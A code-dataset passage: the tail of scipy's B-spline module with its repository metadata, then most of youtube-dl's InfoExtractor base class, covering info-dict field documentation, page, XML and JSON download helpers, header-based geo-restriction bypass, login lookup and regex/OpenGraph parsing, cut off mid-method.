indj = thisj.clip(0, N - 1) # handle edge cases
result += cj[indj] * quadratic(newx - thisj)
res[cond3] = result
return res
|
mbayon/TFG-MachineLearning
|
venv/lib/python3.6/site-packages/scipy/signal/bsplines.py
|
Python
|
mit
| 11,615
|
[
"Gaussian"
] |
8d1dbf5f5166abfbc95763c58f2749bb92236af3b3e059cd36f42d263db501d4
|
# coding: utf-8
from __future__ import unicode_literals
import base64
import datetime
import hashlib
import json
import netrc
import os
import random
import re
import socket
import sys
import time
import math
from ..compat import (
compat_cookiejar,
compat_cookies,
compat_etree_fromstring,
compat_getpass,
compat_integer_types,
compat_http_client,
compat_os_name,
compat_str,
compat_urllib_error,
compat_urllib_parse_unquote,
compat_urllib_parse_urlencode,
compat_urllib_request,
compat_urlparse,
compat_xml_parse_error,
)
from ..downloader.f4m import (
get_base_url,
remove_encrypted_media,
)
from ..utils import (
NO_DEFAULT,
age_restricted,
base_url,
bug_reports_message,
clean_html,
compiled_regex_type,
determine_ext,
determine_protocol,
error_to_compat_str,
ExtractorError,
extract_attributes,
fix_xml_ampersands,
float_or_none,
GeoRestrictedError,
GeoUtils,
int_or_none,
js_to_json,
JSON_LD_RE,
mimetype2ext,
orderedSet,
parse_codecs,
parse_duration,
parse_iso8601,
parse_m3u8_attributes,
RegexNotFoundError,
sanitized_Request,
sanitize_filename,
unescapeHTML,
unified_strdate,
unified_timestamp,
update_Request,
update_url_query,
urljoin,
url_basename,
xpath_element,
xpath_text,
xpath_with_ns,
)
class InfoExtractor(object):
"""Information Extractor class.
Information extractors are the classes that, given a URL, extract
information about the video (or videos) the URL refers to. This
information includes the real video URL, the video title, author and
others. The information is stored in a dictionary which is then
passed to the YoutubeDL. The YoutubeDL processes this
information possibly downloading the video to the file system, among
other possible outcomes.
The type field determines the type of the result.
By far the most common value (and the default if _type is missing) is
"video", which indicates a single video.
For a video, the dictionaries must include the following fields:
id: Video identifier.
title: Video title, unescaped.
Additionally, it must contain either a formats entry or a url one:
formats: A list of dictionaries for each format available, ordered
from worst to best quality.
Potential fields:
* url Mandatory. The URL of the video file
* manifest_url
The URL of the manifest file in case of
fragmented media (DASH, hls, hds)
* ext Will be calculated from URL if missing
* format A human-readable description of the format
("mp4 container with h264/opus").
Calculated from the format_id, width, height.
and format_note fields if missing.
* format_id A short description of the format
("mp4_h264_opus" or "19").
Technically optional, but strongly recommended.
* format_note Additional info about the format
("3D" or "DASH video")
* width Width of the video, if known
* height Height of the video, if known
* resolution Textual description of width and height
* tbr Average bitrate of audio and video in KBit/s
* abr Average audio bitrate in KBit/s
* acodec Name of the audio codec in use
* asr Audio sampling rate in Hertz
* vbr Average video bitrate in KBit/s
* fps Frame rate
* vcodec Name of the video codec in use
* container Name of the container format
* filesize The number of bytes, if known in advance
* filesize_approx An estimate for the number of bytes
* player_url SWF Player URL (used for rtmpdump).
* protocol The protocol that will be used for the actual
download, lower-case.
"http", "https", "rtsp", "rtmp", "rtmpe",
"m3u8", "m3u8_native" or "http_dash_segments".
* fragment_base_url
Base URL for fragments. Each fragment's path
value (if present) will be relative to
this URL.
* fragments A list of fragments of a fragmented media.
Each fragment entry must contain either an url
or a path. If an url is present it should be
considered by a client. Otherwise both path and
fragment_base_url must be present. Here is
the list of all potential fields:
* "url" - fragment's URL
* "path" - fragment's path relative to
fragment_base_url
* "duration" (optional, int or float)
* "filesize" (optional, int)
* preference Order number of this format. If this field is
present and not None, the formats get sorted
by this field, regardless of all other values.
-1 for default (order by other properties),
-2 or smaller for less than default.
< -1000 to hide the format (if there is
another one which is strictly better)
* language Language code, e.g. "de" or "en-US".
* language_preference Is this in the language mentioned in
the URL?
10 if it's what the URL is about,
-1 for default (don't know),
-10 otherwise, other values reserved for now.
* quality Order number of the video quality of this
format, irrespective of the file format.
-1 for default (order by other properties),
-2 or smaller for less than default.
* source_preference Order number for this video source
(quality takes higher priority)
-1 for default (order by other properties),
-2 or smaller for less than default.
* http_headers A dictionary of additional HTTP headers
to add to the request.
* stretched_ratio If given and not 1, indicates that the
video's pixels are not square.
width : height ratio as float.
* no_resume The server does not support resuming the
(HTTP or RTMP) download. Boolean.
* downloader_options A dictionary of downloader options as
described in FileDownloader
url: Final video URL.
ext: Video filename extension.
format: The video format, defaults to ext (used for --get-format)
player_url: SWF Player URL (used for rtmpdump).
The following fields are optional:
alt_title: A secondary title of the video.
display_id An alternative identifier for the video, not necessarily
unique, but available before title. Typically, id is
something like "4234987", title "Dancing naked mole rats",
and display_id "dancing-naked-mole-rats"
thumbnails: A list of dictionaries, with the following entries:
* "id" (optional, string) - Thumbnail format ID
* "url"
* "preference" (optional, int) - quality of the image
* "width" (optional, int)
* "height" (optional, int)
* "resolution" (optional, string "{width}x{height"},
deprecated)
* "filesize" (optional, int)
thumbnail: Full URL to a video thumbnail image.
description: Full video description.
uploader: Full name of the video uploader.
license: License name the video is licensed under.
creator: The creator of the video.
release_date: The date (YYYYMMDD) when the video was released.
timestamp: UNIX timestamp of the moment the video became available.
upload_date: Video upload date (YYYYMMDD).
If not explicitly set, calculated from timestamp.
uploader_id: Nickname or id of the video uploader.
uploader_url: Full URL to a personal webpage of the video uploader.
location: Physical location where the video was filmed.
subtitles: The available subtitles as a dictionary in the format
{tag: subformats}. "tag" is usually a language code, and
"subformats" is a list sorted from lower to higher
preference, each element is a dictionary with the "ext"
entry and one of:
* "data": The subtitles file contents
* "url": A URL pointing to the subtitles file
"ext" will be calculated from URL if missing
automatic_captions: Like 'subtitles', used by the YoutubeIE for
automatically generated captions
duration: Length of the video in seconds, as an integer or float.
view_count: How many users have watched the video on the platform.
like_count: Number of positive ratings of the video
dislike_count: Number of negative ratings of the video
repost_count: Number of reposts of the video
average_rating: Average rating give by users, the scale used depends on the webpage
comment_count: Number of comments on the video
comments: A list of comments, each with one or more of the following
properties (all but one of text or html optional):
* "author" - human-readable name of the comment author
* "author_id" - user ID of the comment author
* "id" - Comment ID
* "html" - Comment as HTML
* "text" - Plain text of the comment
* "timestamp" - UNIX timestamp of comment
* "parent" - ID of the comment this one is replying to.
Set to "root" to indicate that this is a
comment to the original video.
age_limit: Age restriction for the video, as an integer (years)
webpage_url: The URL to the video webpage, if given to youtube-dl it
should allow to get the same result again. (It will be set
by YoutubeDL if it's missing)
categories: A list of categories that the video falls in, for example
["Sports", "Berlin"]
tags: A list of tags assigned to the video, e.g. ["sweden", "pop music"]
is_live: True, False, or None (=unknown). Whether this video is a
live stream that goes on instead of a fixed-length video.
start_time: Time in seconds where the reproduction should start, as
specified in the URL.
end_time: Time in seconds where the reproduction should end, as
specified in the URL.
chapters: A list of dictionaries, with the following entries:
* "start_time" - The start time of the chapter in seconds
* "end_time" - The end time of the chapter in seconds
* "title" (optional, string)
The following fields should only be used when the video belongs to some logical
chapter or section:
chapter: Name or title of the chapter the video belongs to.
chapter_number: Number of the chapter the video belongs to, as an integer.
chapter_id: Id of the chapter the video belongs to, as a unicode string.
The following fields should only be used when the video is an episode of some
series, programme or podcast:
series: Title of the series or programme the video episode belongs to.
season: Title of the season the video episode belongs to.
season_number: Number of the season the video episode belongs to, as an integer.
season_id: Id of the season the video episode belongs to, as a unicode string.
episode: Title of the video episode. Unlike mandatory video title field,
this field should denote the exact title of the video episode
without any kind of decoration.
episode_number: Number of the video episode within a season, as an integer.
episode_id: Id of the video episode, as a unicode string.
The following fields should only be used when the media is a track or a part of
a music album:
track: Title of the track.
track_number: Number of the track within an album or a disc, as an integer.
track_id: Id of the track (useful in case of custom indexing, e.g. 6.iii),
as a unicode string.
artist: Artist(s) of the track.
genre: Genre(s) of the track.
album: Title of the album the track belongs to.
album_type: Type of the album (e.g. "Demo", "Full-length", "Split", "Compilation", etc).
album_artist: List of all artists appeared on the album (e.g.
"Ash Borer / Fell Voices" or "Various Artists", useful for splits
and compilations).
disc_number: Number of the disc or other physical medium the track belongs to,
as an integer.
release_year: Year (YYYY) when the album was released.
Unless mentioned otherwise, the fields should be Unicode strings.
Unless mentioned otherwise, None is equivalent to absence of information.
_type "playlist" indicates multiple videos.
There must be a key "entries", which is a list, an iterable, or a PagedList
object, each element of which is a valid dictionary by this specification.
Additionally, playlists can have "id", "title", "description", "uploader",
"uploader_id", "uploader_url" attributes with the same semantics as videos
(see above).
_type "multi_video" indicates that there are multiple videos that
form a single show, for examples multiple acts of an opera or TV episode.
It must have an entries key like a playlist and contain all the keys
required for a video at the same time.
_type "url" indicates that the video must be extracted from another
location, possibly by a different extractor. Its only required key is:
"url" - the next URL to extract.
The key "ie_key" can be set to the class name (minus the trailing "IE",
e.g. "Youtube") if the extractor class is known in advance.
Additionally, the dictionary may have any properties of the resolved entity
known in advance, for example "title" if the title of the referred video is
known ahead of time.
_type "url_transparent" entities have the same specification as "url", but
indicate that the given additional information is more precise than the one
associated with the resolved URL.
This is useful when a site employs a video service that hosts the video and
its technical metadata, but that video service does not embed a useful
title, description etc.
Subclasses of this one should re-define the _real_initialize() and
_real_extract() methods and define a _VALID_URL regexp.
Probably, they should also be added to the list of extractors.
_GEO_BYPASS attribute may be set to False in order to disable
geo restriction bypass mechanisms for a particular extractor.
Though it won't disable explicit geo restriction bypass based on
country code provided with geo_bypass_country.
_GEO_COUNTRIES attribute may contain a list of presumably geo unrestricted
countries for this extractor. One of these countries will be used by
geo restriction bypass mechanism right away in order to bypass
geo restriction, of course, if the mechanism is not disabled.
_GEO_IP_BLOCKS attribute may contain a list of presumably geo unrestricted
IP blocks in CIDR notation for this extractor. One of these IP blocks
will be used by geo restriction bypass mechanism similarly
to _GEO_COUNTRIES.
Finally, the _WORKING attribute should be set to False for broken IEs
in order to warn the users and skip the tests.
"""
_ready = False
_downloader = None
_x_forwarded_for_ip = None
_GEO_BYPASS = True
_GEO_COUNTRIES = None
_GEO_IP_BLOCKS = None
_WORKING = True
def __init__(self, downloader=None):
"""Constructor. Receives an optional downloader."""
self._ready = False
self._x_forwarded_for_ip = None
self.set_downloader(downloader)
@classmethod
def suitable(cls, url):
"""Receives a URL and returns True if suitable for this IE."""
# This does not use has/getattr intentionally - we want to know whether
# we have cached the regexp for *this* class, whereas getattr would also
# match the superclass
if '_VALID_URL_RE' not in cls.__dict__:
cls._VALID_URL_RE = re.compile(cls._VALID_URL)
return cls._VALID_URL_RE.match(url) is not None
@classmethod
def _match_id(cls, url):
if '_VALID_URL_RE' not in cls.__dict__:
cls._VALID_URL_RE = re.compile(cls._VALID_URL)
m = cls._VALID_URL_RE.match(url)
assert m
return compat_str(m.group('id'))
@classmethod
def working(cls):
"""Getter method for _WORKING."""
return cls._WORKING
def initialize(self):
"""Initializes an instance (authentication, etc)."""
self._initialize_geo_bypass({
'countries': self._GEO_COUNTRIES,
'ip_blocks': self._GEO_IP_BLOCKS,
})
if not self._ready:
self._real_initialize()
self._ready = True
def _initialize_geo_bypass(self, geo_bypass_context):
"""
Initialize geo restriction bypass mechanism.
This method is used to initialize geo bypass mechanism based on faking
X-Forwarded-For HTTP header. A random country from provided country list
is selected and a random IP belonging to this country is generated. This
IP will be passed as X-Forwarded-For HTTP header in all subsequent
HTTP requests.
This method will be used for initial geo bypass mechanism initialization
during the instance initialization with _GEO_COUNTRIES and
_GEO_IP_BLOCKS.
You may also manually call it from extractor's code if geo bypass
information is not available beforehand (e.g. obtained during
extraction) or due to some other reason. In this case you should pass
this information in geo bypass context passed as first argument. It may
contain following fields:
countries: List of geo unrestricted countries (similar
to _GEO_COUNTRIES)
ip_blocks: List of geo unrestricted IP blocks in CIDR notation
(similar to _GEO_IP_BLOCKS)
"""
if not self._x_forwarded_for_ip:
# Geo bypass mechanism is explicitly disabled by user
if not self._downloader.params.get('geo_bypass', True):
return
if not geo_bypass_context:
geo_bypass_context = {}
# Backward compatibility: previously _initialize_geo_bypass
# expected a list of countries, some 3rd party code may still use
# it this way
if isinstance(geo_bypass_context, (list, tuple)):
geo_bypass_context = {
'countries': geo_bypass_context,
}
# The whole point of geo bypass mechanism is to fake IP
# as X-Forwarded-For HTTP header based on some IP block or
# country code.
# Path 1: bypassing based on IP block in CIDR notation
# Explicit IP block specified by user, use it right away
# regardless of whether extractor is geo bypassable or not
ip_block = self._downloader.params.get('geo_bypass_ip_block', None)
# Otherwise use random IP block from geo bypass context but only
# if extractor is known as geo bypassable
if not ip_block:
ip_blocks = geo_bypass_context.get('ip_blocks')
if self._GEO_BYPASS and ip_blocks:
ip_block = random.choice(ip_blocks)
if ip_block:
self._x_forwarded_for_ip = GeoUtils.random_ipv4(ip_block)
if self._downloader.params.get('verbose', False):
self._downloader.to_screen(
'[debug] Using fake IP %s as X-Forwarded-For.'
% self._x_forwarded_for_ip)
return
# Path 2: bypassing based on country code
# Explicit country code specified by user, use it right away
# regardless of whether extractor is geo bypassable or not
country = self._downloader.params.get('geo_bypass_country', None)
# Otherwise use random country code from geo bypass context but
# only if extractor is known as geo bypassable
if not country:
countries = geo_bypass_context.get('countries')
if self._GEO_BYPASS and countries:
country = random.choice(countries)
if country:
self._x_forwarded_for_ip = GeoUtils.random_ipv4(country)
if self._downloader.params.get('verbose', False):
self._downloader.to_screen(
'[debug] Using fake IP %s (%s) as X-Forwarded-For.'
% (self._x_forwarded_for_ip, country.upper()))
def extract(self, url):
"""Extracts URL information and returns it in list of dicts."""
try:
for _ in range(2):
try:
self.initialize()
ie_result = self._real_extract(url)
if self._x_forwarded_for_ip:
ie_result['__x_forwarded_for_ip'] = self._x_forwarded_for_ip
return ie_result
except GeoRestrictedError as e:
if self.__maybe_fake_ip_and_retry(e.countries):
continue
raise
except ExtractorError:
raise
except compat_http_client.IncompleteRead as e:
raise ExtractorError('A network error has occurred.', cause=e, expected=True)
except (KeyError, StopIteration) as e:
raise ExtractorError('An extractor error has occurred.', cause=e)
def __maybe_fake_ip_and_retry(self, countries):
if (not self._downloader.params.get('geo_bypass_country', None) and
self._GEO_BYPASS and
self._downloader.params.get('geo_bypass', True) and
not self._x_forwarded_for_ip and
countries):
country_code = random.choice(countries)
self._x_forwarded_for_ip = GeoUtils.random_ipv4(country_code)
if self._x_forwarded_for_ip:
self.report_warning(
'Video is geo restricted. Retrying extraction with fake IP %s (%s) as X-Forwarded-For.'
% (self._x_forwarded_for_ip, country_code.upper()))
return True
return False
def set_downloader(self, downloader):
"""Sets the downloader for this IE."""
self._downloader = downloader
def _real_initialize(self):
"""Real initialization process. Redefine in subclasses."""
pass
def _real_extract(self, url):
"""Real extraction process. Redefine in subclasses."""
pass
@classmethod
def ie_key(cls):
"""A string for getting the InfoExtractor with get_info_extractor"""
return compat_str(cls.__name__[:-2])
@property
def IE_NAME(self):
return compat_str(type(self).__name__[:-2])
@staticmethod
def __can_accept_status_code(err, expected_status):
assert isinstance(err, compat_urllib_error.HTTPError)
if expected_status is None:
return False
if isinstance(expected_status, compat_integer_types):
return err.code == expected_status
elif isinstance(expected_status, (list, tuple)):
return err.code in expected_status
elif callable(expected_status):
return expected_status(err.code) is True
else:
assert False
def _request_webpage(self, url_or_request, video_id, note=None, errnote=None, fatal=True, data=None, headers={}, query={}, expected_status=None):
"""
Return the response handle.
See _download_webpage docstring for arguments specification.
"""
if note is None:
self.report_download_webpage(video_id)
elif note is not False:
if video_id is None:
self.to_screen('%s' % (note,))
else:
self.to_screen('%s: %s' % (video_id, note))
# Some sites check X-Forwarded-For HTTP header in order to figure out
# the origin of the client behind proxy. This allows bypassing geo
# restriction by faking this header's value to IP that belongs to some
# geo unrestricted country. We will do so once we encounter any
# geo restriction error.
if self._x_forwarded_for_ip:
if 'X-Forwarded-For' not in headers:
headers['X-Forwarded-For'] = self._x_forwarded_for_ip
if isinstance(url_or_request, compat_urllib_request.Request):
url_or_request = update_Request(
url_or_request, data=data, headers=headers, query=query)
else:
if query:
url_or_request = update_url_query(url_or_request, query)
if data is not None or headers:
url_or_request = sanitized_Request(url_or_request, data, headers)
try:
return self._downloader.urlopen(url_or_request)
except (compat_urllib_error.URLError, compat_http_client.HTTPException, socket.error) as err:
if isinstance(err, compat_urllib_error.HTTPError):
if self.__can_accept_status_code(err, expected_status):
return err.fp
if errnote is False:
return False
if errnote is None:
errnote = 'Unable to download webpage'
errmsg = '%s: %s' % (errnote, error_to_compat_str(err))
if fatal:
raise ExtractorError(errmsg, sys.exc_info()[2], cause=err)
else:
self._downloader.report_warning(errmsg)
return False
def _download_webpage_handle(self, url_or_request, video_id, note=None, errnote=None, fatal=True, encoding=None, data=None, headers={}, query={}, expected_status=None):
"""
Return a tuple (page content as string, URL handle).
See _download_webpage docstring for arguments specification.
"""
# Strip hashes from the URL (#1038)
if isinstance(url_or_request, (compat_str, str)):
url_or_request = url_or_request.partition('#')[0]
urlh = self._request_webpage(url_or_request, video_id, note, errnote, fatal, data=data, headers=headers, query=query, expected_status=expected_status)
if urlh is False:
assert not fatal
return False
content = self._webpage_read_content(urlh, url_or_request, video_id, note, errnote, fatal, encoding=encoding)
return (content, urlh)
@staticmethod
def _guess_encoding_from_content(content_type, webpage_bytes):
m = re.match(r'[a-zA-Z0-9_.-]+/[a-zA-Z0-9_.-]+\s*;\s*charset=(.+)', content_type)
if m:
encoding = m.group(1)
else:
m = re.search(br'<meta[^>]+charset=[\'"]?([^\'")]+)[ /\'">]',
webpage_bytes[:1024])
if m:
encoding = m.group(1).decode('ascii')
elif webpage_bytes.startswith(b'\xff\xfe'):
encoding = 'utf-16'
else:
encoding = 'utf-8'
return encoding
def __check_blocked(self, content):
first_block = content[:512]
if ('<title>Access to this site is blocked</title>' in content and
'Websense' in first_block):
msg = 'Access to this webpage has been blocked by Websense filtering software in your network.'
blocked_iframe = self._html_search_regex(
r'<iframe src="([^"]+)"', content,
'Websense information URL', default=None)
if blocked_iframe:
msg += ' Visit %s for more details' % blocked_iframe
raise ExtractorError(msg, expected=True)
if '<title>The URL you requested has been blocked</title>' in first_block:
msg = (
'Access to this webpage has been blocked by Indian censorship. '
'Use a VPN or proxy server (with --proxy) to route around it.')
block_msg = self._html_search_regex(
r'</h1><p>(.*?)</p>',
content, 'block message', default=None)
if block_msg:
msg += ' (Message: "%s")' % block_msg.replace('\n', ' ')
raise ExtractorError(msg, expected=True)
if ('<title>TTK :: Доступ к ресурсу ограничен</title>' in content and
'blocklist.rkn.gov.ru' in content):
raise ExtractorError(
'Access to this webpage has been blocked by decision of the Russian government. '
'Visit http://blocklist.rkn.gov.ru/ for a block reason.',
expected=True)
def _webpage_read_content(self, urlh, url_or_request, video_id, note=None, errnote=None, fatal=True, prefix=None, encoding=None):
content_type = urlh.headers.get('Content-Type', '')
webpage_bytes = urlh.read()
if prefix is not None:
webpage_bytes = prefix + webpage_bytes
if not encoding:
encoding = self._guess_encoding_from_content(content_type, webpage_bytes)
if self._downloader.params.get('dump_intermediate_pages', False):
self.to_screen('Dumping request to ' + urlh.geturl())
dump = base64.b64encode(webpage_bytes).decode('ascii')
self._downloader.to_screen(dump)
if self._downloader.params.get('write_pages', False):
basen = '%s_%s' % (video_id, urlh.geturl())
if len(basen) > 240:
h = '___' + hashlib.md5(basen.encode('utf-8')).hexdigest()
basen = basen[:240 - len(h)] + h
raw_filename = basen + '.dump'
filename = sanitize_filename(raw_filename, restricted=True)
self.to_screen('Saving request to ' + filename)
# Working around MAX_PATH limitation on Windows (see
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx)
if compat_os_name == 'nt':
absfilepath = os.path.abspath(filename)
if len(absfilepath) > 259:
filename = '\\\\?\\' + absfilepath
with open(filename, 'wb') as outf:
outf.write(webpage_bytes)
try:
content = webpage_bytes.decode(encoding, 'replace')
except LookupError:
content = webpage_bytes.decode('utf-8', 'replace')
self.__check_blocked(content)
return content
def _download_webpage(
self, url_or_request, video_id, note=None, errnote=None,
fatal=True, tries=1, timeout=5, encoding=None, data=None,
headers={}, query={}, expected_status=None):
"""
Return the data of the page as a string.
Arguments:
url_or_request -- plain text URL as a string or
a compat_urllib_request.Requestobject
video_id -- Video/playlist/item identifier (string)
Keyword arguments:
note -- note printed before downloading (string)
errnote -- note printed in case of an error (string)
fatal -- flag denoting whether error should be considered fatal,
i.e. whether it should cause ExtractionError to be raised,
otherwise a warning will be reported and extraction continued
tries -- number of tries
timeout -- sleep interval between tries
encoding -- encoding for a page content decoding, guessed automatically
when not explicitly specified
data -- POST data (bytes)
headers -- HTTP headers (dict)
query -- URL query (dict)
expected_status -- allows to accept failed HTTP requests (non 2xx
status code) by explicitly specifying a set of accepted status
codes. Can be any of the following entities:
- an integer type specifying an exact failed status code to
accept
- a list or a tuple of integer types specifying a list of
failed status codes to accept
- a callable accepting an actual failed status code and
returning True if it should be accepted
Note that this argument does not affect success status codes (2xx)
which are always accepted.
"""
success = False
try_count = 0
while success is False:
try:
res = self._download_webpage_handle(
url_or_request, video_id, note, errnote, fatal,
encoding=encoding, data=data, headers=headers, query=query,
expected_status=expected_status)
success = True
except compat_http_client.IncompleteRead as e:
try_count += 1
if try_count >= tries:
raise e
self._sleep(timeout, video_id)
if res is False:
return res
else:
content, _ = res
return content
def _download_xml_handle(
self, url_or_request, video_id, note='Downloading XML',
errnote='Unable to download XML', transform_source=None,
fatal=True, encoding=None, data=None, headers={}, query={},
expected_status=None):
"""
Return a tuple (xml as an xml.etree.ElementTree.Element, URL handle).
See _download_webpage docstring for arguments specification.
"""
res = self._download_webpage_handle(
url_or_request, video_id, note, errnote, fatal=fatal,
encoding=encoding, data=data, headers=headers, query=query,
expected_status=expected_status)
if res is False:
return res
xml_string, urlh = res
return self._parse_xml(
xml_string, video_id, transform_source=transform_source,
fatal=fatal), urlh
def _download_xml(
self, url_or_request, video_id,
note='Downloading XML', errnote='Unable to download XML',
transform_source=None, fatal=True, encoding=None,
data=None, headers={}, query={}, expected_status=None):
"""
Return the xml as an xml.etree.ElementTree.Element.
See _download_webpage docstring for arguments specification.
"""
res = self._download_xml_handle(
url_or_request, video_id, note=note, errnote=errnote,
transform_source=transform_source, fatal=fatal, encoding=encoding,
data=data, headers=headers, query=query,
expected_status=expected_status)
return res if res is False else res[0]
def _parse_xml(self, xml_string, video_id, transform_source=None, fatal=True):
if transform_source:
xml_string = transform_source(xml_string)
try:
return compat_etree_fromstring(xml_string.encode('utf-8'))
except compat_xml_parse_error as ve:
errmsg = '%s: Failed to parse XML ' % video_id
if fatal:
raise ExtractorError(errmsg, cause=ve)
else:
self.report_warning(errmsg + str(ve))
def _download_json_handle(
self, url_or_request, video_id, note='Downloading JSON metadata',
errnote='Unable to download JSON metadata', transform_source=None,
fatal=True, encoding=None, data=None, headers={}, query={},
expected_status=None):
"""
Return a tuple (JSON object, URL handle).
See _download_webpage docstring for arguments specification.
"""
res = self._download_webpage_handle(
url_or_request, video_id, note, errnote, fatal=fatal,
encoding=encoding, data=data, headers=headers, query=query,
expected_status=expected_status)
if res is False:
return res
json_string, urlh = res
return self._parse_json(
json_string, video_id, transform_source=transform_source,
fatal=fatal), urlh
def _download_json(
self, url_or_request, video_id, note='Downloading JSON metadata',
errnote='Unable to download JSON metadata', transform_source=None,
fatal=True, encoding=None, data=None, headers={}, query={},
expected_status=None):
"""
Return the JSON object as a dict.
See _download_webpage docstring for arguments specification.
"""
res = self._download_json_handle(
url_or_request, video_id, note=note, errnote=errnote,
transform_source=transform_source, fatal=fatal, encoding=encoding,
data=data, headers=headers, query=query,
expected_status=expected_status)
return res if res is False else res[0]
def _parse_json(self, json_string, video_id, transform_source=None, fatal=True):
if transform_source:
json_string = transform_source(json_string)
try:
return json.loads(json_string)
except ValueError as ve:
errmsg = '%s: Failed to parse JSON ' % video_id
if fatal:
raise ExtractorError(errmsg, cause=ve)
else:
self.report_warning(errmsg + str(ve))
def report_warning(self, msg, video_id=None):
idstr = '' if video_id is None else '%s: ' % video_id
self._downloader.report_warning(
'[%s] %s%s' % (self.IE_NAME, idstr, msg))
def to_screen(self, msg):
"""Print msg to screen, prefixing it with '[ie_name]'"""
self._downloader.to_screen('[%s] %s' % (self.IE_NAME, msg))
def report_extraction(self, id_or_name):
"""Report information extraction."""
self.to_screen('%s: Extracting information' % id_or_name)
def report_download_webpage(self, video_id):
"""Report webpage download."""
self.to_screen('%s: Downloading webpage' % video_id)
def report_age_confirmation(self):
"""Report attempt to confirm age."""
self.to_screen('Confirming age')
def report_login(self):
"""Report attempt to log in."""
self.to_screen('Logging in')
@staticmethod
def raise_login_required(msg='This video is only available for registered users'):
raise ExtractorError(
'%s. Use --username and --password or --netrc to provide account credentials.' % msg,
expected=True)
@staticmethod
def raise_geo_restricted(msg='This video is not available from your location due to geo restriction', countries=None):
raise GeoRestrictedError(msg, countries=countries)
# Methods for following #608
@staticmethod
def url_result(url, ie=None, video_id=None, video_title=None):
"""Returns a URL that points to a page that should be processed"""
# TODO: ie should be the class used for getting the info
video_info = {'_type': 'url',
'url': url,
'ie_key': ie}
if video_id is not None:
video_info['id'] = video_id
if video_title is not None:
video_info['title'] = video_title
return video_info
def playlist_from_matches(self, matches, playlist_id=None, playlist_title=None, getter=None, ie=None):
urls = orderedSet(
self.url_result(self._proto_relative_url(getter(m) if getter else m), ie)
for m in matches)
return self.playlist_result(
urls, playlist_id=playlist_id, playlist_title=playlist_title)
@staticmethod
def playlist_result(entries, playlist_id=None, playlist_title=None, playlist_description=None):
"""Returns a playlist"""
video_info = {'_type': 'playlist',
'entries': entries}
if playlist_id:
video_info['id'] = playlist_id
if playlist_title:
video_info['title'] = playlist_title
if playlist_description:
video_info['description'] = playlist_description
return video_info
def _search_regex(self, pattern, string, name, default=NO_DEFAULT, fatal=True, flags=0, group=None):
"""
Perform a regex search on the given string, using a single or a list of
patterns returning the first matching group.
In case of failure return a default value or raise a WARNING or a
RegexNotFoundError, depending on fatal, specifying the field name.
"""
if isinstance(pattern, (str, compat_str, compiled_regex_type)):
mobj = re.search(pattern, string, flags)
else:
for p in pattern:
mobj = re.search(p, string, flags)
if mobj:
break
if not self._downloader.params.get('no_color') and compat_os_name != 'nt' and sys.stderr.isatty():
_name = '\033[0;34m%s\033[0m' % name
else:
_name = name
if mobj:
if group is None:
# return the first matching group
return next(g for g in mobj.groups() if g is not None)
else:
return mobj.group(group)
elif default is not NO_DEFAULT:
return default
elif fatal:
raise RegexNotFoundError('Unable to extract %s' % _name)
else:
self._downloader.report_warning('unable to extract %s' % _name + bug_reports_message())
return None
def _html_search_regex(self, pattern, string, name, default=NO_DEFAULT, fatal=True, flags=0, group=None):
"""
Like _search_regex, but strips HTML tags and unescapes entities.
"""
res = self._search_regex(pattern, string, name, default, fatal, flags, group)
if res:
return clean_html(res).strip()
else:
return res
def _get_netrc_login_info(self, netrc_machine=None):
username = None
password = None
netrc_machine = netrc_machine or self._NETRC_MACHINE
if self._downloader.params.get('usenetrc', False):
try:
info = netrc.netrc().authenticators(netrc_machine)
if info is not None:
username = info[0]
password = info[2]
else:
raise netrc.NetrcParseError(
'No authenticators for %s' % netrc_machine)
except (IOError, netrc.NetrcParseError) as err:
self._downloader.report_warning(
'parsing .netrc: %s' % error_to_compat_str(err))
return username, password
def _get_login_info(self, username_option='username', password_option='password', netrc_machine=None):
"""
Get the login info as (username, password)
First look for the manually specified credentials using username_option
and password_option as keys in params dictionary. If no such credentials
available look in the netrc file using the netrc_machine or _NETRC_MACHINE
value.
If there's no info available, return (None, None)
"""
if self._downloader is None:
return (None, None)
downloader_params = self._downloader.params
# Attempt to use provided username and password or .netrc data
if downloader_params.get(username_option) is not None:
username = downloader_params[username_option]
password = downloader_params[password_option]
else:
username, password = self._get_netrc_login_info(netrc_machine)
return username, password
def _get_tfa_info(self, note='two-factor verification code'):
"""
Get the two-factor authentication info
TODO - asking the user will be required for sms/phone verify
currently just uses the command line option
If there's no info available, return None
"""
if self._downloader is None:
return None
downloader_params = self._downloader.params
if downloader_params.get('twofactor') is not None:
return downloader_params['twofactor']
return compat_getpass('Type %s and press [Return]: ' % note)
# Helper functions for extracting OpenGraph info
@staticmethod
def _og_regexes(prop):
content_re = r'content=(?:"([^"]+?)"|\'([^\']+?)\'|\s*([^\s"\'=<>`]+?))'
property_re = (r'(?:name|property)=(?:\'og:%(prop)s\'|"og:%(prop)s"|\s*og:%(prop)s\b)'
% {'prop': re.escape(prop)})
template = r'<meta[^>]+?%s[^>]+?%s'
return [
template % (property_re, content_re),
template % (content_re, property_re),
]
@staticmethod
def _meta_regex(prop):
return r'''(?isx)<meta
(?=[^>]+(?:itemprop|name|property|id|http-equiv)=(["\']?)%s\1)
[^>]+?content=(["\'])(?P<content>.*?)\2''' % re.escape(prop)
def _og_search_property(self, prop, html, name=None, **kargs):
if not isinstance(prop, (list, tuple)):
prop = [prop]
if name is None:
name = 'OpenGraph %s' % prop[0]
og_regexes = []
for p in prop:
og_regexes.extend(self._og_regexes(p))
escaped = self._search_regex(og_regexes, html, name, flags=re.DOTALL, **kargs)
if escaped is None:
return None
return unescapeHTML(escaped)
def _og_search_thumbnail(self, html, **kargs):
return self._og_search_property('image', html, 'thumbnail URL', fatal=False, **kargs)
def _og_search_description(self, html, **kargs):
return self._og_search_property('description', html, fatal=False, **kargs)
def _og_search_title(self, html, **kargs):
return self._og_search_property('title', html, **kargs)
def _og_search_video_url(self, html, name='video url', secure=True, **kargs):
regexes = self._og_regexes('video') + self._og_regexes('video:url')
if secure:
regexes = self._og_regexes('video:secure_url') + regexes
return self._html_search_regex(regexes, html, name, **kargs)
def _og_search_url(self, html, **kargs):
return self._og_search_property('url', html, **kargs)
def _html_search_meta(self, name, html, display_name=None, fatal=False, **kwargs):
if not isinstance(name, (list, tuple)):
name = [name]
if display_name is None:
display_name = name[0]
return self._html_search_regex(
[self._meta_regex(n) for n in name],
html, display_name, fatal=fatal, group='content', **kwargs)
def _dc_search_uploader(self, html):
return self._html_search_meta('dc.creator', html, 'uploader')
def _rta_search(self, html):
